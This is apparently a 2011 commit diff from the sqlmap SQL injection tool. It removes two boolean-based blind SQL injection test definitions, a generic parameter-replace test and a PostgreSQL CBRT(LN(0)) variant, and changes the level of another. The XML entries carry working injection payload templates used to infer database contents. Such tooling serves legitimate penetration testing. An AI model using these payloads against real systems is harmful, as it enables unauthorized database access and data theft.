removing (CBRT(LN(0)) because it's nothing special compared to standard 1/0; also, removing parameter replacement with returned value 1 as it doesn't have much sense in comparison to origvalue one (which is far more stable and usable)

This commit is contained in:
Miroslav Stampar 2011-05-18 23:20:02 +00:00
parent fe50d09cc8
commit e58d6d2e00

View File

@ -578,26 +578,10 @@ Formats:
<!-- Boolean-based blind tests - Parameter replace --> <!-- Boolean-based blind tests - Parameter replace -->
<test>
<title>Generic boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
</response>
</test>
<test> <test>
<title>Generic boolean-based blind - Parameter replace (original value)</title> <title>Generic boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype> <stype>1</stype>
<level>3</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>3</where> <where>3</where>
@ -687,25 +671,6 @@ Formats:
</details> </details>
</test> </test>
<test>
<title>PostgreSQL boolean-based blind - Parameter replace (CBRT(LN(0)) - original value)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</vector>
<request>
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</payload>
</request>
<response>
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</comparison>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test> <test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title> <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype> <stype>1</stype>